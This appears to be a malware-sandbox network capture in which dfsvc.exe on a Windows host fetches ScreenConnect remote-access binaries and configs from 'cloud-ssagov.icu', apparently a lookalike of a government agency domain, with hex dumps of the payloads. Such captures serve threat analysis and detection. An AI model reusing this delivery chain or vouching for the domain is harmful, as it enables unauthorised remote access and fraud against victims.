2024-11-13 17:18:00 UTC	16384	IN	Data Raw: 52 47 4c 47 53 51 41 76 51 66 51 69 53 55 38 6c 4d 44 6c 42 4b 78 78 45 69 6c 32 41 51 74 76 78 4b 49 41 42 6c 44 4c 68 69 6b 42 65 79 69 42 30 33 49 52 4f 4a 4e 49 68 77 69 59 52 71 7a 46 42 66 41 44 6b 68 51 41 42 54 41 6c 73 41 38 42 4f 35 4e 49 50 79 4e 67 6b 59 31 59 57 36 4a 69 65 30 53 53 41 74 44 4b 73 54 45 42 6c 79 2b 42 53 77 70 59 34 5a 74 49 38 51 74 59 63 69 4d 57 53 7a 67 41 31 44 4a 4d 4b 49 47 58 59 31 49 79 41 48 31 76 49 69 6b 51 63 4c 59 52 61 35 38 6c 48 41 42 51 50 53 31 72 2f 69 31 66 41 71 2b 58 6a 63 43 5a 52 46 70 46 77 43 49 62 73 59 34 6f 67 41 47 67 63 6c 4a 7a 41 6b 34 2b 68 68 5a 77 51 39 74 43 61 42 55 43 7a 6a 35 4e 75 45 30 42 44 41 42 56 30 37 63 6e 34 4c 4b 50 49 70 55 57 63 4b 4a 74 49 62 51 4f 41 63 74 73 78 4b 49 41 Data Ascii: RGLGSQAvQfQiSU8lMDlBKxxEil2AQtvxKIABlDLhikBeyiB03IROJNIhwiYRqzFBfADkhQABTAlsA8BO5NIPyNgkY1YW6Jie0SSAtDKsTEBly+BSwpY4ZtI8QtYciMWSzgA1DJMKIGXY1IyAH1vIikQcLYRa58lHABQPS1r/i1fAq+XjcCZRFpFwCIbsY4ogAGgclJzAk4+hhZwQ9tCaBUCzj5NuE0BDABV07cn4LKPIpUWcKJtIbQOActsxKIA
2024-11-13 17:18:00 UTC	2742	IN	Data Raw: 45 71 6e 30 2f 6d 36 76 75 46 33 44 55 41 41 6a 79 75 41 5a 37 59 30 49 61 32 66 6e 35 7a 2b 64 64 61 36 34 58 4e 71 6e 58 57 33 44 30 34 36 58 2f 33 53 41 51 6a 67 34 45 6e 51 4d 2b 2f 32 52 67 2f 67 69 54 31 4b 47 31 39 50 74 73 2f 61 42 54 36 78 64 76 66 30 70 4f 4e 47 44 41 68 67 52 76 4f 78 6c 37 2b 2f 7a 38 7a 73 4e 6e 51 4f 35 63 62 35 61 62 64 64 37 6e 4f 37 69 4f 45 6a 74 32 46 41 41 42 4e 51 42 50 33 2b 34 6b 2f 50 47 39 69 45 31 44 6e 6f 44 76 76 68 58 61 54 77 2b 62 72 66 51 6b 41 41 4d 31 49 52 39 4b 65 4c 50 2f 33 36 72 46 6c 4e 53 42 75 64 37 66 61 6f 6e 32 42 72 32 31 55 59 45 4d 43 4d 55 49 50 31 35 76 4b 50 49 39 5a 68 62 55 35 57 2b 6e 62 62 51 5a 2f 69 52 51 69 37 43 51 4d 43 6d 43 46 72 73 4b 35 38 47 53 6d 41 6e 30 37 4f 30 65 6d 63 Data Ascii: Eqn0/m6vuF3DUAAjyuAZ7Y0Ia2fn5z+dda64XNqnXW3D046X/3SAQjg4EnQM+/2Rg/giT1KG19Pts/aBT6xdvf0pONGDAhgRvOxl7+/z8zsNnQO5cb5abdd7nO7iOEjt2FAABNQBP3+4k/PG9iE1DnoDvvhXaTw+brfQkAAM1IR9KeLP/36rFlNSBud7faon2Br21UYEMCMUIP15vKPI9ZhbU5W+nbbQZ/iRQi7CQMCmCFrsK58GSmAn07O0emc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:01 UTC	98	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:01 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17858 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:01 GMT Connection: close
2024-11-13 17:18:01 UTC	16150	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-11-13 17:18:01 UTC	1708	IN	Data Raw: 36 4d 44 44 6e 53 6c 72 7a 6d 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 Data Ascii: 6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49749	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:07 UTC	124	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:18:08 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95512 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:08 GMT Connection: close
2024-11-13 17:18:08 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-11-13 17:18:08 UTC	16384	IN	Data Raw: 68 7c dd 40 00 6a 02 e8 85 fe ff ff 83 c4 10 8b f0 ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 Data Ascii: h\|@jut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@
2024-11-13 17:18:08 UTC	16384	IN	Data Raw: 85 c9 74 03 f0 ff 01 8b 88 84 00 00 00 85 c9 74 03 f0 ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 Data Ascii: ttttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@
2024-11-13 17:18:08 UTC	16384	IN	Data Raw: 59 06 83 c0 18 03 c1 85 db 74 1b 8b 7d 0c 8b 70 0c 3b fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 Data Ascii: Yt}p;rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UE
2024-11-13 17:18:08 UTC	16384	IN	Data Raw: 67 00 62 00 00 00 64 00 61 00 2d 00 64 00 6b 00 00 00 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d Data Ascii: gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-
2024-11-13 17:18:08 UTC	13826	IN	Data Raw: a0 32 b6 32 cc 32 e3 32 ea 32 f6 32 09 33 0e 33 1a 33 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 Data Ascii: 2222223333033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49750	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:09 UTC	108	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:09 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61208 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:09 GMT Connection: close
2024-11-13 17:18:09 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 63 2b 80 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 b8 72 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc+"0 @ r@
2024-11-13 17:18:09 UTC	16384	IN	Data Raw: 16 00 7a 16 7f 0e 16 00 58 0d 87 0e 36 00 6d 08 8f 0e 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d Data Ascii: zX6m"`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
2024-11-13 17:18:09 UTC	16384	IN	Data Raw: 61 72 63 68 42 6f 78 49 6e 70 75 74 4c 65 6e 67 74 68 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d Data Ascii: archBoxInputLengthThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParam
2024-11-13 17:18:09 UTC	12290	IN	Data Raw: 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 33 00 2e 00 37 00 2e 00 39 00 30 00 36 00 37 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 33 00 2e 00 37 00 2e Data Ascii: ScreenConnect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.3.7.9067@Assembly Version24.3.7.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49752	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:10 UTC	112	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:10 UTC	232	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:10 GMT Connection: close
2024-11-13 17:18:10 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49754	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:11 UTC	107	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:12 UTC	232	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:11 GMT Connection: close
2024-11-13 17:18:12 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49755	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:13 UTC	115	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:13 UTC	232	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:13 GMT Connection: close
2024-11-13 17:18:13 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49757	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:14 UTC	129	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:18:14 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81688 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:14 GMT Connection: close
